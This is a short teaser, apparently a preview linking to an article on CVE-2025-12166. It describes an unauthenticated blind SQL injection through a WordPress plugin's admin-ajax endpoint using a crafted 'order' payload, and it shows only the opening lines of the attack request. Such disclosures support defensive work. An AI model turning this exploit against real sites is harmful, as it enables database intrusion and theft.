CVE-2025-12166
## The Exploit Unauthenticated attackers can abuse the plugin's public query endpoint by sending a specially crafted `order` payload to force a blind SQL injection. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET Content-Type:...
Read article →